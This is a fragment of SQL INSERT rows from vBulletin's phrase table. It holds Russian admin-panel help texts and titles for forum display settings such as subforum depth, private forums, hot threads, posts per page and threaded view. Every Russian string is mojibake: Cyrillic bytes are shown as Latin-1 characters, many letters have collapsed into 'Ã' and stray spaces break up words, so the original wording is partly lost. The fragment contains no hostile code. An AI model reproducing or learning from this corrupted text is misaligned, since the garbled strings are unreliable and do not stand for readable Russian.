(23446, -1, 'options_options_activememberdays_text', 'cphelptext', 'Åñëè âû æåëà åòå ðà çäåëèòü ïîëüçîâà òåëåé Ãà òåõ, êòî ðåãóëÿðÃî ïîñåùà åò ôîðóì, è îñòà ëüÃûõ, òî ýòî îïöèÿ äëÿ âà ñ. \r\n \r\nÓêà çà â ÷èñëî äÃåé â ýòîì ïà ðà ìåòðå, ñèñòåìà ïîìåòèò ïîëüçîâà òåëåé, êîòîðûå ÃÃ¥ ïîñåùà ëè ôîðóì óêà çà ÃÃîå êîëè÷åñòâî äÃåé êà ê \"Ãåà êòèâÃûå\". \r\n \r\nÃòî îïöèÿ èñïîëüçóåòñÿ êà ê ìåõà Ãèçì âûáîðêè äëÿ Ãà ñòðîåê \"Îïöèè à êòèâÃûõ ïîëüçîâà òåëåé\".', 'vbulletin', '', 0, ''),
(23447, -1, 'options_options_activememberdays_title', 'cphelptext', 'Âðåìÿ äëÿ à êòèâÃîãî ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23448, -1, 'options_options_activememberoptions_text', 'cphelptext', 'Êà ê è ãîâîðèòñÿ â îïèñà Ãèè, âû ìîæåòå îòîáðà æà òü äÃè ðîæäåÃèÿ òîëüêî à êòèâÃûõ ïîëüçîâà òåëåé. Ãòî ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ \"ñóìà òîõè äÃåé ðîæäåÃèé\", âûçâà ÃÃîãî Ãåà êòèâÃûìè ïîëüçîâà òåëÿìè, êîòîðûì âñ¸ ðà âÃî, ïîçäðà âèëè èõ èëè Ãåò.', 'vbulletin', '', 0, ''),
(23449, -1, 'options_options_activememberoptions_title', 'cphelptext', 'Îïöèè à êòèâÃûõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23450, -1, 'options_options_forumhomedepth_text', 'cphelptext', 'Ãà ïðèìåð, åñëè óñòà Ãîâèòü çÃà ÷åÃèå \"2\", à âà ø ôîðóì ôà êòè÷åñêè èìååò ñëåäóþùèé âèä: \r\nÎñÃîâÃîé ðà çäåë \r\n-- Ãîäðà çäåë \r\n---- Ãîä-ïîäðà çäåë \r\nòî Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà áóäóò îòîáðà æà òüñÿ òîëüêî 2 âåðõÃèõ óðîâÃÿ âëîæåÃÃîñòè ðà çäåëîâ: \r\nÎñÃîâÃîé ðà çäåë \r\n-- Ãîäðà çäåë \r\nÃîìÃèòå: Åñëè çäåñü óêà çà Ãî ÷èñëî áîëüøå 2, òî âà ì ñëåäóåò ñîçäà òü ñîîòâåòñòâóþùèå øà áëîÃû äëÿ òà êèõ ãëóáèÃ.', 'vbulletin', 'zCarot', 1201874756, '3.7.0 Beta 5'),
(23451, -1, 'options_options_forumhomedepth_title', 'cphelptext', 'ÃëóáèÃà îòîáðà æåÃèÿ ïîäðà çäåëîâ Ãà ãëà âÃîé ñòðà Ãèöå', 'vbulletin', '', 0, ''),
(23452, -1, 'options_options_forumdisplaydepth_text', 'cphelptext', 'Ãà ïðèìåð, åñëè óñòà Ãîâèòü çÃà ÷åÃèå 2 è âà øè ðà çäåëû ðà ñïîëà ãà þòñÿ òà ê: \r\nÃëà âÃûé ðà çäåë \r\n-- Ãîäðà çäåë \r\n---- Ãîä-ïîäðà çäåë \r\nÒî, åñëè âû ñåé÷à ñ ïðîñìà òðèâà åòå ãëà âÃûé ðà çäåë, òî âû óâèäèòå Ãà ñòðà Ãèöå ñî ñïèñêîì ðà çäåëîâ ïåðâûå äâà óðîâÃÿ ïîäðà çäåëîâ ãëà âÃîãî: \r\n-- Ãîäðà çäåë \r\n---- Ãîä-ïîäðà çäåë', 'vbulletin', '', 0, ''),
(23453, -1, 'options_options_forumdisplaydepth_title', 'cphelptext', 'ÃëóáèÃà îòîáðà æåÃèÿ ïîäðà çäåëîâ â ðà çäåëà õ ôîðóìà ', 'vbulletin', '', 0, ''),
(23454, -1, 'options_options_subforumdepth_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ãëóáèÃó îòîáðà æåÃèÿ ïîäðà çäåëîâ â âèäå ññûëîê ñ çîÃû îïèñà Ãèÿ ãëà âÃîãî ðà çäåëà . \r\n\r\nÃà ïðèìåð, åñëè âà øè ðà çäåëû âûãëÿäÿò òà ê: \r\n\r\nÃëà âÃûé ðà çäåë \r\n-- Ãîäðà çäåë \r\n---- Ãîä-ïîäðà çäåë \r\n\r\nè âà øà ãëóáèÃà ïîäðà çäåëîâ óñòà ÃîâëåÃà Ãà 2, à ýòîò ïà ðà ìåòð óñòà Ãîâëåà Ãà 3, òî ïåðâûå äâà ðà çäåëà áóäóò îòîáðà æåÃû \"ïîëÃîñòüþ\" Ãà âà øåé ãëà âÃîé ñòðà Ãèöå ôîðóìà , à ðà çäåë 3-ãî óðîâÃÿ \"ïîä-ïîäðà çäåë\" áóäåò îòîáðà æà òüñÿ â îïèñà Ãèè ðà çäåëà \"ïîäðà çäåë: \r\n\r\nÃëà âÃûé ðà çäåë \r\n-- Ãîäðà çäåë \r\n îïèñà Ãèå ïîäðà çäåëà . \r\n Ãîäðà çäåëû: Ãîä-ïîäðà çäåë', 'vbulletin', '', 0, ''),
(23455, -1, 'options_options_subforumdepth_title', 'cphelptext', 'ÃëóáèÃà îòîáðà æåÃèÿ ïîäðà çäåëîâ', 'vbulletin', '', 0, ''),
(23456, -1, 'options_options_showforumdescription_text', 'cphelptext', 'Ãà ðà ìåòð îïðåäåëÿåò, ñòîèò ëè îòîáðà æà òü îïèñà Ãèå ðà çäåëà èëè Ãåò. Îïèñà Ãèå ðà çäåëà ìîæÃî óêà çà òü ïðè ðåäà êòèðîâà Ãèè îïðåäåëåÃÃûõ ðà çäåëîâ çäåñü .', 'vbulletin', '', 0, ''),
(23457, -1, 'options_options_showforumdescription_title', 'cphelptext', 'Îòîáðà æà òü îïèñà Ãèå ðà çäåëà â ñïèñêå ðà çäåëîâ', 'vbulletin', '', 0, ''),
(23458, -1, 'options_options_showprivateforums_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ñêðûòûå ðà çäåëû ÃÃ¥ áóäóò îòîáðà æà òüñÿ ïîëüçîâà òåëÿì, ó êîòîðûõ Ãåò ê Ãèì äîñòóïà . Ãîëüçîâà òåëè ñ ïðà âà ìè äîñòóïà äîëæÃû ñÃà ÷à ëà áóäóò âîéòè Ãà ôîðóì, ÷òîáû óâèäåòü è ïîïà ñòü â ýòè ðà çäåëû. Åñëè æå âû óñòà Ãîâèòå ýòó îïöèþ Ãà \"Äà \", òî ïîëüçîâà òåëè áåç ïðà â äîñòóïà ê ðà çäåëó, âñ¸ ðà âÃî áóäóò âèäåòü åãî. ÂîçìîæÃîñòü âèäåòü ñ÷¸ò÷èê ñîîáùåÃèé ðà çäåëà îïðåäåëÿåòñÿ âòîðîé îïöèåé \"Äà \". Åñëè ê ðà çäåëó òðåáóåòñÿ ïà ðîëü, òî îà áóäåò îñòà âà òüñÿ ñêðûòûì äî òåõ ïîð, ïîêà ÃÃ¥ áóäåò ââåä¸à ïðà âèëüÃûé ïà ðîëü.', 'vbulletin', '', 0, ''),
(23459, -1, 'options_options_showprivateforums_title', 'cphelptext', 'Îòîáðà æà òü ñêðûòûå ðà çäåëû', 'vbulletin', '', 0, ''),
(23460, -1, 'options_options_hideprivateforums_text', 'cphelptext', 'Ãà çäåë ñêðûòûé, åñëè ïîëüçîâà òåëü ÃÃ¥ èìååò ê Ãåìó äîñòóï. Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ñêðûòûå ðà çäåëû ÃÃ¥ áóäóò îòîáðà æà òüñÿ ïîëüçîâà òåëÿì, êîòîðûì çà ïðåù¸à äîñòóï ê Ãèì, ïîýòîìó îÃè äà æå ÃÃ¥ áóäóò çÃà òü îá èõ ñóùåñòâîâà Ãèè. ;) \r\n\r\nÅñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè áóäóò âèäåòü ñêðûòûå ðà çäåëû, Ãî ÃÃ¥ ñìîãóò â Ãèõ âîéòè.', 'vbulletin', '', 0, ''),
(23461, -1, 'options_options_hideprivateforums_title', 'cphelptext', 'Îòîáðà æà òü ñêðûòûå ðà çäåëû', 'vbulletin', '', 0, ''),
(23462, -1, 'options_options_showlocks_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , Ãà ôîðóìå áóäóò îòîáðà æà òüñÿ èêîÃêè ñ çà ìêîì äëÿ îáîçÃà ÷åÃèÿ òîãî, ÷òî ïîëüçîâà òåëü ÃÃ¥ èìååò äîñòóïà ê ýòèì ðà çäåëà ì.', 'vbulletin', '', 0, ''),
(23463, -1, 'options_options_showlocks_title', 'cphelptext', 'Îòîáðà æà òü èêîÃêè ñ çà ìêîì', 'vbulletin', '', 0, ''),
(23464, -1, 'options_options_lastthreadchars_text', 'cphelptext', 'Ãòà îïöèÿ ïîìîãà åò èçáåæà òü äëèÃÃûõ Ãà çâà Ãèé òåì, çà Ãèìà þùèõ ñëèøêîì ìÃîãî ìåñòà è ðà ñòÿãèâà þùèõ ÿ÷åéêè òà áëèöû.', 'vbulletin', '', 0, ''),
(23465, -1, 'options_options_lastthreadchars_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ îòîáðà æà åìà ÿ äëèÃà çà ãîëîâêà òåìû', 'vbulletin', '', 0, ''),
(23466, -1, 'options_options_showmoderatorcolumn_text', 'cphelptext', 'Âû ìîæåòå âûêëþ÷èòü êîëîÃêó ìîäåðà òîðîâ. Ãà ïðèìåð, åñëè ó âà ñ ïðîñòî Ãåò ìîäåðà òîðîâ, ëèáî âû ïðîñòî ÃÃ¥ æåëà åòå, ÷òîáû ïîëüçîâà òåëè âèäåëè èõ ñïèñîê, ëèáî îÃà çà Ãèìà åò ìÃîãî ìåñòà .', 'vbulletin', '', 0, ''),
(23467, -1, 'options_options_showmoderatorcolumn_title', 'cphelptext', 'Îòîáðà æà òü êîëîÃêó ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(23468, -1, 'options_options_nav_forumdesc_text', 'cphelptext', 'Âî âñåõ ôîðóìà õ (ïðè âêëþ÷åÃèè ýòîé îïöèè) ïîä Ãà âèãà öèîÃÃîé ïà Ãåëüþ (Ãà âåðõó ñòðà Ãèöû) áóäåò îòîáðà æà òüñÿ îïèñà Ãèå ñîîòâåòñòâóþùåãî ðà çäåëà .', 'vbulletin', '', 0, ''),
(23469, -1, 'options_options_nav_forumdesc_title', 'cphelptext', 'Âêëþ÷èòü îïèñà Ãèå ðà çäåëîâ', 'vbulletin', '', 0, ''),
(23470, -1, 'options_options_showprefixlastpost_text', 'cphelptext', 'Åñëè òåìà èìååò ïðåôèêñ, òî ýòîò ïà ðà ìåòð îïðåäåëÿåò, îòîáðà æà òü ëè ïðåôèêñ òåìû â êîëîÃêå \"ÃîñëåäÃåå ñîîáùåÃèå\" â ñïèñêå ðà çäåëîâ. Ãðåôèêñ áóäåò âñåãäà îòîáðà æà òü ïîëÃîñòüþ, âìåñòå ñ ïåðâûìè {$vbulletin->options[lastthreadchars]} ñèìâîëà ìè Ãà çâà Ãèÿ òåìû. Ãðè âêëþ÷åÃèè äà ÃÃîãî ïà ðà ìåòðà , âåðîÿòÃî, óâåëè÷èòüñÿ øèðèÃà ýòîé êîëîÃêè.', 'vbulletin', 'zCarot', 1190113107, '3.7.0 Beta 1'),
(23471, -1, 'options_options_showprefixlastpost_title', 'cphelptext', 'Îòîáðà æà òü ïðåôèêñ òåìû â êîëîÃêå ïîñëåäÃåãî ñîîáùåÃèÿ ðà çäåëà ?', 'vbulletin', 'zCarot', 1190113107, '3.7.0 Beta 1'),
(23472, -1, 'options_options_showforumusers_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè Ãà êà æäîé ñòðà Ãèöå forumdisplay.php áóäåò ïîêà çà à ñïèñîê ïîëüçîâà òåëåé, êîòîðûå â äà ÃÃûé ìîìåÃò ïðîñìà òðèâà þò ñîîòâåòñòâóþùèé ðà çäåë. Åñëè âû çà áîòèòåñü î ïðîèçâîäèòåëüÃîñòè, òî âûêëþ÷èòå ýòî. Ñóùåñòâóåò 4 âà ðèà Ãòà îòîáðà æåÃèÿ: \r\nÄà , ïî à ëôà âèòó äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ïî à ëôà âèòó òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà .', 'vbulletin', 'zCarot', 1145485621, '3.6.0 Beta 1'),
(23473, -1, 'options_options_showforumusers_title', 'cphelptext', 'Ãîêà çûâà òü ïîëüçîâà òåëåé, ïðîñìà òðèâà þùèõ ðà çäåëû', 'vbulletin', '', 0, ''),
(23474, -1, 'options_options_maxthreads_text', 'cphelptext', 'Îïðåäåëèòå ìà êñèìà ëüÃîå ÷èñëî òåì Ãà ñòðà Ãèöó, âûâîäèìûõ ñêðèïòîì forumdisplay.php. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208965541, '3.7.0 Release Candidate 4'),
(23475, -1, 'options_options_maxthreads_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî òåì Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23476, -1, 'options_options_showstickies_text', 'cphelptext', 'Âà æÃûå òåìû îòîáðà æà þòñÿ Ãà âåðõó ñïèñêà âñåõ òåì ðà çäåëà . Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî âà æÃûå òåìû áóäóò îòîáðà æåÃû ÃÃ¥ òîëüêî Ãà ïåðâîé ñòðà Ãèöå ñïèñêà òåì ðà çäåëà , Ãî è Ãà âñåõ ïîñëåäóþùèõ.', 'vbulletin', '', 0, ''),
(23477, -1, 'options_options_showstickies_title', 'cphelptext', 'Ãîêà çûâà òü âà æÃûå òåìû Ãà âñåõ ñòðà Ãèöà õ', 'vbulletin', '', 0, ''),
(23478, -1, 'options_options_showdots_text', 'cphelptext', 'Ãòî ïîëåçÃî äëÿ ïîìîùè ïîëüçîâà òåëÿì çà ïîìèÃà òü ìåñòà , ãäå îÃè îòâå÷à ëè Ãà áîëüøèõ ôîðóìà õ. ÃôôåêòèâÃîñòü ýòîé îïöèè ñÃèæà åòñÿ ñ óâåëè÷åÃèåì ðà çìåðîâ ôîðóìà .', 'vbulletin', '', 0, ''),
(23479, -1, 'options_options_showdots_title', 'cphelptext', 'Ãîäñâå÷èâà òü òåìû, â êîòîðûõ ïèñà ë ïîëüçîâà òåëü', 'vbulletin', '', 0, ''),
(23480, -1, 'options_options_usehotthreads_text', 'cphelptext', 'Òåìà , â êîòîðîé åñòü êà ê ìèÃèìóì X îòâåòîâ è/èëè X ïðîñìîòðîâ Ãà çûâà åòñÿ ïîïóëÿðÃîé. Âû ìîæåòå óêà çà òü ìèÃèìà ëüÃîå ÷èñëî ïðîñìîòðîâ è îòâåòîâ Ãèæå.', 'vbulletin', '', 0, ''),
(23481, -1, 'options_options_usehotthreads_title', 'cphelptext', 'Âêëþ÷èòü \"ïîïóëÿðÃûå\" òåìû', 'vbulletin', '', 0, ''),
(23482, -1, 'options_options_hotnumberviews_text', 'cphelptext', 'Óêà æèòå ìèÃèìà ëüÃîå ÷èñëî ïðîñìîòðîâ, Ãåîáõîäèìûõ äëÿ òîãî, ÷òîáû òåìà ñ÷èòà ëà ñü ïîïóëÿðÃîé.', 'vbulletin', '', 0, ''),
(23483, -1, 'options_options_hotnumberviews_title', 'cphelptext', 'ÌèÃèìà ëüÃîå êîëè÷åñòâî ïðîñìîòðîâ ïîïóëÿðÃîé òåìû', 'vbulletin', '', 0, ''),
(23484, -1, 'options_options_hotnumberposts_text', 'cphelptext', 'Óêà æèòå ìèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé, Ãåîáõîäèìûõ äëÿ òîãî, ÷òîáû òåìà ñ÷èòà ëà ñü ïîïóëÿðÃîé.', 'vbulletin', '', 0, ''),
(23485, -1, 'options_options_hotnumberposts_title', 'cphelptext', 'ÌèÃèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé â ïîïóëÿðÃîé òåìå', 'vbulletin', '', 0, ''),
(23486, -1, 'options_options_linktopages_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò ïîëüçîâà òåëÿì ïåðåõîäèòü èç ñïèñêà òåì ñðà çó Ãà îïðåäåëåÃÃóþ ñòðà Ãèöó ÃóæÃîé òåìû, èçáåæà â Ãåîáõîäèìîñòè ñÃà ÷à ëà ïðîñìîòðåòü ïåðâóþ ñòðà Ãèöó òåìû.', 'vbulletin', '', 0, ''),
(23487, -1, 'options_options_linktopages_title', 'cphelptext', 'Îòîáðà æà òü ññûëêè Ãà ñòðà Ãèöû òåìû', 'vbulletin', '', 0, ''),
(23488, -1, 'options_options_maxmultipage_text', 'cphelptext', 'Åñëè òåìà ñîñòîèò èç 75 ñòðà Ãèö, âåðîÿòÃî, âà ì ÃÃ¥ ÃóæÃû ññûëêè Ãà êà æäóþ èç Ãèõ Ãà ñòðà Ãèöå ñïèñêà òåì. Èñïîëüçóéòå ýòó îïöèþ, ÷òîáû îãðà Ãè÷èòü êîëè÷åñòâî ññûëîê äëÿ ïåðåõîäà Ãà ñòðà Ãèöó.', 'vbulletin', '', 0, ''),
(23489, -1, 'options_options_maxmultipage_title', 'cphelptext', 'Ìà êñèìóì ññûëîê Ãà ñòðà Ãèöû òåìû', 'vbulletin', '', 0, ''),
(23490, -1, 'options_options_threadpreview_text', 'cphelptext', 'Êîãäà êóðñîð ìûøêè Ãà õîäèòñÿ Ãà ä ññûëêîé Ãà òåìó, âîçÃèêà åò ìà ëåÃüêîå îêîøêî, îòîáðà æà þùåå ñîäåðæà Ãèå ïåðâîãî ñîîáùåÃèÿ â òåìå. Ãòîò ïà ðà ìåòð âëèÿåò Ãà ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ ïðè îòîáðà æåÃèè.', 'vbulletin', '', 0, ''),
(23491, -1, 'options_options_threadpreview_title', 'cphelptext', 'ÄëèÃà òåêñòà ïðåäïðîñìîòðà òåìû', 'vbulletin', '', 0, ''),
(23492, -1, 'options_options_oneannounce_text', 'cphelptext', 'Åñëè âûêëþ÷åÃî, òî âñå îáúÿâëåÃèÿ Ãà ôîðóìå áóäóò èìåòü èÃäèâèäóà ëüÃûå ññûëêè (êà ê òåìû) Ãà ñòðà Ãèöå forumdisplay.php. Åñëè âêëþ÷åÃî, òî âñå îáúÿâëåÃèÿ áóäóò îáúåäèÃÃ¥Ãû â îäÃó \"òåìó\", ãäå êà æäîå îáúÿâëåÃèå áóäåò \"ñîîáùåÃèåì\".', 'vbulletin', '', 0, ''),
(23493, -1, 'options_options_oneannounce_title', 'cphelptext', 'Ãðóïïèðîâà òü îáúÿâëåÃèÿ', 'vbulletin', '', 0, ''),
(23494, -1, 'options_options_showthreadusers_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè Ãà êà æäîé ñòðà Ãèöå showthread.php áóäåò ïîêà çà à ñïèñîê ïîëüçîâà òåëåé, êîòîðûå â äà ÃÃûé ìîìåÃò ïðîñìà òðèâà þò ñîîòâåòñòâóþùóþ òåìó. Åñëè âû çà áîòèòåñü î ïðîèçâîäèòåëüÃîñòè, òî âûêëþ÷èòå ýòî. Ñóùåñòâóåò 4 âà ðèà Ãòà îòîáðà æåÃèÿ: \r\nÄà , ïî à ëôà âèòó äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ïî à ëôà âèòó òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà \r\n.', 'vbulletin', 'zCarot', 1145485645, '3.6.0 Beta 1'),
(23495, -1, 'options_options_showthreadusers_title', 'cphelptext', 'Ãîêà çûâà òü, êòî ïðîñìà òðèâà åò òåìó', 'vbulletin', '', 0, ''),
(23496, -1, 'options_options_maxposts_text', 'cphelptext', 'Åñëè òåìà ñîñòîèò èç 40 ñîîáùåÃèé, è âû óñòà Ãîâèòå çÃà ÷åÃèå ýòîé îïöèè Ãà 10, òî ñîîáùåÃèÿ áóäóò ñãðóïïèðîâà Ãû â 4 ñòðà Ãèöû. Ãîëüçîâà òåëè ñìîãóò óñòà Ãà âëèâà òü äðóãèå çÃà ÷åÃèÿ â ñâîåì ïðîôèëå, åñëè âû äà äèòå èì òà êóþ âîçìîæÃîñòü (ïîäðîáÃåå ñì. \"Âà ðèà Ãòû ìà êñèìà ëüÃîãî êîëè÷åñòâà ñîîáùåÃèé Ãà ñòðà Ãèöó\" Ãèæå). \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208965595, '3.7.0 Release Candidate 4'),
(23497, -1, 'options_options_maxposts_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23498, -1, 'options_options_usermaxposts_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü âà ðèà Ãòû îòîáðà æåÃèÿ êîëè÷åñòâà ñîîáùåÃèé Ãà ñòðà Ãèöó äëÿ âûáîðà èõ âà øèìè ïîëüçîâà òåëÿìè.', 'vbulletin', '', 0, ''),
(23499, -1, 'options_options_usermaxposts_title', 'cphelptext', 'Âà ðèà Ãòû ìà êñèìà ëüÃîãî êîëè÷åñòâà ñîîáùåÃèé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23500, -1, 'options_options_showdeficon_text', 'cphelptext', 'Ãòà èêîÃêà ñîîáùåÃèé áóäåò èñïîëüçîâà òüñÿ êà ê èêîÃêà ïî óìîë÷à Ãèþ, åñëè ïîëüçîâà òåëü ÃÃ¥ âûáðà ë äðóãóþ.', 'vbulletin', '', 0, ''),
(23501, -1, 'options_options_showdeficon_title', 'cphelptext', 'Ãîêà çûâà òü ýòó èêîÃêó ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23502, -1, 'options_options_wordwrap_text', 'cphelptext', 'Ãòî ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ ââîäà äëèÃÃûõ ñëîâ, ðà ñòÿãèâà þùèõ ñîäåðæèìîå âà øåãî ôîðóìà . \r\n\r\nÃîìÃèòå, åñëè âû ÃÃ¥ èñïîëüçóåòå ïðåäâà ðèòåëüÃî îòôîðìà òèðîâà ÃÃûé òåêñò, òî X ñèìâîëîâ ÃÃ¥ áóäóò ðà âÃû ýòîé æå øèðèÃÃ¥ (ò.Ã¥. ïðîèçâåäåÃèþ øèðèÃû îäÃîãî ñèìâîëà Ãà èõ êîëè÷åñòâî), ïîòîìó ÷òî ðà çÃûå ñèìâîëû èìåþò ðà çÃóþ øèðèÃó.', 'vbulletin', '', 0, ''),
(23503, -1, 'options_options_wordwrap_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ äî ïåðåâîäà ñòðîêè', 'vbulletin', '', 0, ''),
(23504, -1, 'options_options_threadvoted_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ïðè ïðîñìîòðå òåìû áóäåò îïðåäåëÿòüñÿ, ÃÃ¥ ïðîãîëîñîâà ë ëè óæå â Ãåé ïîëüçîâà òåëü. Âû ìîæåòå âûêëþ÷èòü ýòî äëÿ óâåëè÷åÃèÿ ïðîèçâîäèòåëüÃîñòè.', 'vbulletin', '', 0, ''),
(23505, -1, 'options_options_threadvoted_title', 'cphelptext', 'Ãðîâåðÿòü ðåéòèÃã òåìû', 'vbulletin', '', 0, ''),
(23506, -1, 'options_options_threadsubscribed_text', 'cphelptext', 'Ãîëüçîâà òåëè çà õîòåëè áû çÃà òü, ÷òî îÃè ïîäïèñà Ãû Ãà ïðîñìà òðèâà åìóþ â äà ÃÃûé ìîìåÃò òåìó, ïîýòîìó äëÿ Ãèõ ëó÷øå áû âêëþ÷èòü ýòó îïöèþ, Ãî åñëè âû çà áîòèòåñü î ïðîèçâîäèòåëüÃîñòè, òî å¸ ñëåäóåò âûêëþ÷èòü.', 'vbulletin', '', 0, ''),
(23507, -1, 'options_options_threadsubscribed_title', 'cphelptext', 'Ãðîâåðÿòü ïîäïèñêó Ãà òåìû', 'vbulletin', '', 0, ''),
(23508, -1, 'options_options_showsimilarthreads_text', 'cphelptext', 'Ãòà îïöèÿ äà ¸ò âîçìîæÃîñòü îòîáðà æåÃèÿ ïîõîæèõ òåì îòäåëüÃî îò îñòà ëüÃûõ. Îïöèÿ \"Àâòîìà òè÷åñêèé ïîèñê ïîõîæèõ òåì\" äîëæÃà áûòü âêëþ÷åÃà äëÿ ïîèñêà ïîõîæèõ òåì. Âûêëþ÷èòå îáå îïöèè, åñëè âû ÃÃ¥ æåëà åòå èñïîëüçîâà òü ýòó âîçìîæÃîñòü.', 'vbulletin', '', 0, ''),
(23509, -1, 'options_options_showsimilarthreads_title', 'cphelptext', 'Îòîáðà æà òü ïîõîæèå òåìû', 'vbulletin', '', 0, ''),
(23510, -1, 'options_options_postelements_text', 'cphelptext', 'ÃëåìåÃòû ñîîáùåÃèÿ - ÷à ñòè èÃôîðìà öèè, êîòîðà ÿ îòîáðà æà åòñÿ â ðà çäåëå èÃôîðìà öèè î ïîëüçîâà òåëå â ñîîáùåÃèè. Âûáåðèòå ýëåìåÃòû, êîòîðûå æåëà åòå îòîáðà æà òü. \r\n\r\nÃîìÃèòå, ÷òî ýòè ýëåìåÃòû ñîîáùåÃèé óâåëè÷èâà þò âðåìÿ îáðà áîòêè ñòðà Ãèö òåì. Ãà ïðèìåð, ÷òîáû ïîëó÷èòü âîçðà ñò ïîëüçîâà òåëÿ, ôîðóì äîëæåà ñðà âÃèòü åãî äà òó ðîæäåÃèÿ ñ òåêóùåé äà òîé. Ãòî âû÷èñëåÃèå äåëà åòñÿ äëÿ êà æäîãî ñîîáùåÃèÿ, îòîáðà æà åìîãî â òåìå. ÄîïîëÃèòåëüÃà ÿ Ãà ãðóçêà ìà ëà , Ãî îÃà åñòü. Åñëè âû æåëà åòå óâåëè÷èòü ñêîðîñòü çà ãðóçêè ñòðà Ãèö, òî âû ìîæåòå âûêëþ÷èòü ýòè ýëåìåÃòû ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(23511, -1, 'options_options_postelements_title', 'cphelptext', 'ÃëåìåÃòû ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23512, -1, 'options_options_allowthreadedmode_text', 'cphelptext', 'Ãòè ðåæèìû - à ëüòåðÃà òèâÃûå ðåæèìû îòîáðà æåÃèÿ ñîîáùåÃèé â òåìå. Ãîëüçîâà òåëü ñìîæåò âûñòà âèòü ñîáñòâåÃÃûå Ãà ñòðîéêè äëÿ ýòèõ ðåæèìîâ â ñâîåé ïà Ãåëè óïðà âëåÃèÿ. \r\n \r\nÄðåâîâèäÃûé ðåæèì ïðåäñòà âëÿåò òåìó â âèäå äåðåâà ññûëîê Ãà îòäåëüÃûå ñîîáùåÃèÿ.  âåðøèÃÃ¥ äåðåâà ðà ñïîëîæåÃà ññûëêà Ãà ïåðâîå ñîîáùåÃèå òåìû, Ãèæå - ññûëêè Ãà îòâåòû â ïîðÿäêå èõ ïîñòóïëåÃèÿ.  êà æäûé ìîìåÃò âðåìåÃè âèäåà òåêñò òîëüêî îäÃîãî ñîîáùåÃèÿ. \r\n \r\nÊîìáèÃèðîâà ÃÃûé ðåæèì ñîâìåùà åò â ñåáå äâà ðåæèìà - ëèÃåéÃûé (îáû÷Ãûé) è äðåâîâèäÃûé.', 'vbulletin', 'zCarot', 1205942462, '3.7.0 Release Candidate 1'),
